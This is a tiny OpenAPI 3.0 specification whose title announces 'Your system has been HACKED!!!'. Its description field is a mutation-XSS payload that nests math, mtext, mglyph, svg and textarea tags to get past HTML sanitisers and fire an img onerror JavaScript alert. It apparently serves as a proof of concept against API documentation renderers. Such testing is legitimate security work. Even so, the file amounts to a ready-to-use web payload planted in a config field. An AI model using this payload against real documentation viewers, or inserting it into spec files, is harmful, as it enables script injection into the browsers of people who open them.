openapi: 3.0.0
info:
  title: Your system has been HACKED!!!
  description: <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</svg><img src='#' onerror='javascript:alert(`Hckd`)'>">
  version: 0.1.9

